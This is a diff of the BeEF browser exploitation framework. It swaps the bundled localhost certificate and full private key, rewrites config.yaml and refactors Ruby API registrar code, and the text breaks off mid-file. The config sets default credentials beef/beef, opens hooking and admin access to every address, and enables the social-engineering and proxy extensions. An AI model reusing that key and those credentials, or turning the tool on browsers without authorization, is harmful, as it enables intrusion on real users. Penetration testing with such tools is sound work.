-dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
-BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
-MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
-eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
-cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
-VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
-0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
-F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
-kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
-kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
-B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
-JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
-GkY0IBg9+j6XX4JwEXxCGt0a
+MIIECTCCAnGgAwIBAgIUbx/YybkSOL8uO0qikl/wsL4xLeIwDQYJKoZIhvcNAQEL
+BQAwFDESMBAGA1UEAwwJbG9jYWxob3N0MB4XDTE5MDIxNjEzMjYxNFoXDTI5MDIx
+MzEzMjYxNFowFDESMBAGA1UEAwwJbG9jYWxob3N0MIIBojANBgkqhkiG9w0BAQEF
+AAOCAY8AMIIBigKCAYEAteQJ2fooOffGU8jFkArCsFaJZW5WSuc5j7i2ciG0LY2C
+lVg1Uy7/6xHe048RJAD9AnWajf9Jt7NpAAoyRmFJOepZS8CStON4mBrKUFI4rzAB
+W9F7nov5+k+GK11kuvPFyAQCGs82RpGXsEP2ktsimsWvI8jnt7B+DXltqxeWavXB
+TYOTsDhyRxXcNPGgenOabtya1XsAecTs4JPOsV4L/hnTS70X8BNOcMRFRNb3W5C0
+w3vnid9Q6jhDRC6ghpeVWgnlymqV0Y6v1pbWZRs71sKQF/V5Td5zA8pr9r30YFAD
+Wbkb33vicU5BkZ8PQeUygqtqKOhni9i8Yg1otkXmqWsmo5sV/GgKHvkxOoQBlzv3
+hhMyYEnKjhPuepKl/VW17zRFdMCQZbvtW9/WBX4AwtKNAxYiRRO5jvDU1pX0nfXw
+86ZPfkbkPdJJYqZqqsOSSOVSpCkoLJv/owaY10XwgSEl8rA+3t03/9B6s09Q0o28
+0zXu/CMiSBNSEJlJSNdZAgMBAAGjUzBRMB0GA1UdDgQWBBTULhamHun+PWMkHDzg
+5yHcv0KOmTAfBgNVHSMEGDAWgBTULhamHun+PWMkHDzg5yHcv0KOmTAPBgNVHRMB
+Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAZo9xPTktJ1aTxTXfLKivqbPin
+5CiRl5DWh1niPUFowmuAGbDCYOHA/+fzhBhFWj3LVaX2dQSpYxiqnfb5FWaxNK+8
+9A0AKgf8f2cpJ22QleDFOsyCw8jxzSfmOKKQLifY5Ty5C5P8xb9T0B7LbyR8r17p
+sr77eM/5tBpsIIh40AZjoDhi/HHrtqxEb+DgnTRHIBMmzvwkk+v4iXBDCO5BHFof
+gVXOF3MrovhH+qA8HFl9diJ6MtTltVAqI0eShBLd2MJ068qKqb+I6pyXGmlrk9Ei
+H0XrKlKEKjyum6ZEPr5Mn+NA+4ePRv1mPHoaopJoNhgRislfryGFLJwxeuMJfQOU
+oZTmgK8Ur0TYLl/wqf9avX3A8hkffNZXukmzNwjzLVG252RPA2Iq3y1+7VgOjaBJ
+rNbwArYInhfF5hJesjo3LAD9H29dFxR6dztpOcDCkaOZEdlz+fvqUFYJzwuHmuSi
+DLyqAOr77CjoWEMSHcXUEGUeJDKVqLgzqC9lqf4=
 -----END CERTIFICATE-----
--- a/beef_key.pem
+++ b/beef_key.pem
@@ -1,16 +1,40 @@
 -----BEGIN PRIVATE KEY-----
-MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
-X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
-KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
-0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
-HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
-4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
-5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
-26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
-yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
-rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
-AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
-QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
-WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
-yBgay+U9QuoEO425
+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
+jyItP2FJBbw7BlIq7t2c2G66
 -----END PRIVATE KEY-----
--- a/config.yaml
+++ b/config.yaml
@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file

 beef:
-    version: '0.4.6.1-alpha'
+    version: '0.4.7.4-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
@@ -14,13 +14,21 @@ beef:
    # Used for generating secure tokens
    crypto_default_value_length: 80

+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
-        permitted_hooking_subnet: "0.0.0.0/0"
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
-        #permitted_ui_subnet: "127.0.0.1/32"
-        permitted_ui_subnet: "0.0.0.0/0"
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"

    # HTTP server
    http:
@@ -35,23 +43,20 @@ beef:
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

-        # Reverse Proxy / NAT
-        # If BeEF is running behind a reverse proxy or NAT
-        #  set the public hostname and port here
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
        #public: ""      # public hostname/IP address
-        #public_port: "" # experimental

-        # DNS
-        dns_host: "localhost"
-        dns_port: 53
-
-        # Web Admin user interface URI
-        web_ui_basepath: "/ui"
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        #public: ""      # public hostname/IP address
+        #public_port: "" # public port (experimental)

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
-        session_cookie_name: "BEEFSESSION"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
@@ -68,6 +73,7 @@ beef:
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
@@ -79,39 +85,12 @@ beef:
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
+            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
-        # For information on using other databases please read the
-        # README.databases file
-
-        # supported DBs: sqlite, mysql, postgres
-        # NOTE: you must change the Gemfile adding a gem require line like:
-        #   gem "dm-postgres-adapter"
-        # or
-        #   gem "dm-mysql-adapter"
-        # if you want to switch drivers from sqlite to postgres (or mysql).
-        # Finally, run a 'bundle install' command and start BeEF.
-        driver: "sqlite"
-
-        # db_file is only used for sqlite
-        db_file: "beef.db"
-
-        # db connection information is only used for mysql/postgres
-        db_host: "localhost"
-        db_port: 3306
-        db_name: "beef"
-        db_user: "beef"
-        db_passwd: "beef"
-        db_encoding: "UTF-8"
-
-    # Credentials to authenticate in BeEF.
-    # Used by both the RESTful API and the Admin_UI extension
-    credentials:
-        user:   "beef"
-        passwd: "beef"
+        file: "beef.db"

    # Autorun Rule Engine
    autorun:
@@ -130,12 +109,10 @@ beef:
    dns_hostname_lookup: false

    # IP Geolocation
-    # NOTE: requires MaxMind database:
-    #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
-    #   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
-        enable: false
-        database: '/opt/GeoIP/GeoLiteCity.dat'
+        enable: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
@@ -145,27 +122,27 @@ beef:
            enable: false

    # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
    extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
        requester:
            enable: true
        proxy:
            enable: true
-            key: "beef_key.pem"
-            cert: "beef_cert.pem"
+        network:
+            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
-        evasion:
-            enable: false
-        console:
-             shell:
-                enable: false
-        ipec:
+        xssrays:
            enable: true
-        # this is still experimental..
-        dns:
-            enable: true
-        # this is still experimental..
-        dns_rebinding:
-            enable: false
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,168 +7,205 @@
 module BeEF
  module API

+    #
    # Registrar class to handle all registered timed API calls
+    #
    class Registrar
-
      include Singleton

+      #
      # Create registrar
+      #
      def initialize
        @registry = []
        @count = 1
      end

      # Register timed API calls to an owner
+      #
      # @param [Class] owner the owner of the API hook
      # @param [Class] c the API class the owner would like to hook into
      # @param [String] method the method of the class the owner would like to execute
      # @param [Array] params an array of parameters that need to be matched before the owner will be called
+      #
      def register(owner, c, method, params = [])
-        if self.verify_api_path(c, method)
-          if not self.registered?(owner, c, method, params)
-            id = @count
-            @registry << {
-                'id' => id,
-                'owner' => owner,
-                'class' => c,
-                'method' => method,
-                'params' => params
-            }
-            @count += 1
-            return id
-          else
-            print_debug "API Registrar: Attempting to re-register API call #{c.to_s} :#{method.to_s}"
-          end
-        else
-          print_error "API Registrar: Attempted to register non-existant API method #{c.to_s} :#{method.to_s}"
+        unless verify_api_path(c, method)
+          print_error "API Registrar: Attempted to register non-existant API method #{c} :#{method}"
+          return
        end
+
+        if registered?(owner, c, method, params)
+          print_debug "API Registrar: Attempting to re-register API call #{c} :#{method}"
+          return
+        end
+
+        id = @count
+        @registry << {
+          'id'     => id,
+          'owner'  => owner,
+          'class'  => c,
+          'method' => method,
+          'params' => params
+        }
+        @count += 1
+
+        id
      end

+      #
      # Tests whether the owner is registered for an API hook
+      #
      # @param [Class] owner the owner of the API hook
      # @param [Class] c the API class
      # @param [String] method the method of the class
      # @param [Array] params an array of parameters that need to be matched
+      #
      # @return [Boolean] whether or not the owner is registered
+      #
      def registered?(owner, c, method, params = [])
-        @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
-            return true
-          end
-        }
-        return false
+        @registry.each do |r|
+          next unless r['owner'] == owner
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          return true
+        end
+        false
      end

+      #
      # Match a timed API call to determine if an API.fire() is required
+      #
      # @param [Class] c the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
+      #
      # @return [Boolean] whether or not the arguments match an entry in the API registry
+      #
      def matched?(c, method, params = [])
-        @registry.each{|r|
-          if r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
-            return true
-          end
-        }
-        return false
+        @registry.each do |r|
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          return true
+        end
+        false
      end

+      #
      # Un-registers an API hook
+      #
      # @param [Integer] id the ID of the API hook
+      #
      def unregister(id)
-        @registry.delete_if{|r|
-          r['id'] == id
-        }
+        @registry.delete_if {|r| r['id'] == id }
      end

+      #
      # Retrieves all the owners and ID's of an API hook
      # @param [Class] c the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
+      #
      # @return [Array] an array of hashes consisting of two keys :owner and :id
+      #
      def get_owners(c, method, params = [])
        owners = []
-        @registry.each{|r|
-          if r['class'] == c and r['method'] == method
-            if self.is_matched_params?(r, params)
-              owners << { :owner => r['owner'], :id => r['id']}
-            end
-          end
-        }
-        return owners
+        @registry.each do |r|
+          next unless r['class'] == c
+          next unless r['method'] == method
+          next unless is_matched_params? r, params
+          owners << { :owner => r['owner'], :id => r['id'] }
+        end
+        owners
      end

+      #
      # Verifies that the api_path has been regitered
      # Verifies the API path has been registered.
+      #
      # @note This is a security precaution
+      #
      # @param [Class] c the target API class to verify
      # @param [String] m the target method to verify
+      #
      def verify_api_path(c, m)
-        return (c.const_defined?('API_PATHS') and c.const_get('API_PATHS').has_key?(m))
+        (c.const_defined?('API_PATHS') && c.const_get('API_PATHS').key?(m))
      end

+      #
      # Retrieves the registered symbol reference for an API hook
+      #
      # @param [Class] c the target API class to verify
      # @param [String] m the target method to verify
+      #
      # @return [Symbol] the API path
+      #
      def get_api_path(c, m)
-        return (self.verify_api_path(c, m)) ? c.const_get('API_PATHS')[m] : nil;
+        verify_api_path(c, m) ? c.const_get('API_PATHS')[m] : nil
      end

+      #
      # Matches stored API params to params
+      #
      # @note If a stored API parameter has a NilClass the parameter matching is skipped for that parameter
      # @note By default this method returns true, this is either because the API.fire() did not include any parameters or there were no parameters defined for this registry entry
+      #
      # @param [Hash] reg hash of registry element, must contain 'params' key
      # @param [Array] params array of parameters to be compared to the stored parameters
+      #
      # @return [Boolean] whether params matches the stored API parameters
+      #
      def is_matched_params?(reg, params)
        stored = reg['params']
-        if stored.length == params.length
-          matched = true
-          stored.each_index{|i|
-            next if stored[i] == nil
-            if not stored[i] == params[i]
-              matched = false
-            end
-          }
-          return false if not matched
+        return true unless stored.length == params.length
+
+        stored.each_index do |i|
+          next if stored[i].nil?
+          return false unless stored[i] == params[i]
        end
-        return true
+
+        true
      end

+      #
      # Fires all owners registered to this API hook
+      #
      # @param [Class] c the target API class
      # @param [String] m the target API method
      # @param [Array] *args parameters passed for the API call
-      # @return [Hash, NilClass] returns either a Hash of :api_id and :data if the owners return data, otherwise NilClass
+      #
+      # @return [Hash, NilClass] returns either a Hash of :api_id and :data
+      #         if the owners return data, otherwise NilClass
+      #
      def fire(c, m, *args)
-        mods = self.get_owners(c, m, args)
-        if mods.length > 0
-          data = []
-          if self.verify_api_path(c, m) and c.ancestors[0].to_s > "BeEF::API"
-            method = self.get_api_path(c, m)
-            mods.each do |mod|
-              begin
-                #Only used for API Development (very verbose)
-                #print_info "API: #{mod} fired #{method}"
-                result = mod[:owner].method(method).call(*args)
-                if not result == nil
-                  data << {:api_id => mod[:id], :data => result}
-                end
-              rescue => e
-                print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
-              end
-            end
-          else
-            print_error "API Path not defined for Class: #{c.to_s} method:#{method.to_s}"
-          end
-          return data
+        mods = get_owners(c, m, args)
+        return nil unless mods.length.positive?
+
+        unless verify_api_path(c, m) && c.ancestors[0].to_s > 'BeEF::API'
+          print_error "API Path not defined for Class: #{c} method:#{method}"
+          return []
        end
-        return nil
+
+        data = []
+        method = get_api_path(c, m)
+        mods.each do |mod|
+          begin
+            # Only used for API Development (very verbose)
+            # print_info "API: #{mod} fired #{method}"
+
+            result = mod[:owner].method(method).call(*args)
+            unless result.nil?
+              data << { :api_id => mod[:id], :data => result }
+            end
+          rescue => e
+            print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
+          end
+        end
+
+        data
      end
-
    end
-
  end
 end

--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -29,12 +29,7 @@ require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'

-# @note Include the distributed engine
-require 'core/main/distributed_engine/models/rules'
-
 # @note Include the autorun engine
-require 'core/main/autorun_engine/models/rule'
-require 'core/main/autorun_engine/models/execution'
 require 'core/main/autorun_engine/parser'
 require 'core/main/autorun_engine/engine'
 require 'core/main/autorun_engine/rule_loader'
@@ -48,6 +43,7 @@ require 'core/hbmanager'

 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
+require 'core/main/rest/handlers/browserdetails'
 require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,7 @@ end
 end

 # @note Includes database models - the order must be consistent otherwise DataMapper goes crazy
-require 'core/main/models/user'
+require 'core/main/model'
 require 'core/main/models/commandmodule'
 require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
@@ -18,11 +18,12 @@ require 'core/main/models/command'
 require 'core/main/models/result'
 require 'core/main/models/optioncache'
 require 'core/main/models/browserdetails'
+require 'core/main/models/rule'
+require 'core/main/models/execution'

 # @note Include the constants
 require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
-require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
 require 'core/main/constants/hardware'

@@ -32,12 +33,9 @@ require 'core/main/command'
 require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'
+require 'core/main/geoip'

 # @note Include the command line parser and the banner printer
 require 'core/main/console/commandline'
 require 'core/main/console/banners'

-# @note Include rubyzip lib
-require 'zip'
-
-
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,36 +10,40 @@ module BeEF
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension exists in BeEF's configuration
    def self.is_present(ext)
-      return BeEF::Core::Configuration.instance.get('beef.extension').has_key?(ext.to_s)
+      BeEF::Core::Configuration.instance.get('beef.extension').key? ext.to_s
    end

    # Checks to see if extension is enabled in configuration
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension is enabled 
    def self.is_enabled(ext)
-      return (self.is_present(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.enable') == true)
+      return false unless is_present(ext)
+      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.enable") == true
    end

    # Checks to see if extension has been loaded
    # @param [String] ext the extension key
-    # @return [Boolean] whether or not the extension is loaded 
+    # @return [Boolean] whether or not the extension is loaded
    def self.is_loaded(ext)
-      return (self.is_enabled(ext) and BeEF::Core::Configuration.instance.get('beef.extension.'+ext.to_s+'.loaded') == true)
+      return false unless is_enabled(ext)
+      BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.loaded") == true
    end

    # Loads an extension 
    # @param [String] ext the extension key
    # @return [Boolean] whether or not the extension loaded successfully
-    # @todo Wrap the require() statement in a try catch block to allow BeEF to fail gracefully if there is a problem with that extension - Issue #480
    def self.load(ext)
-      if File.exists?('extensions/'+ext+'/extension.rb')
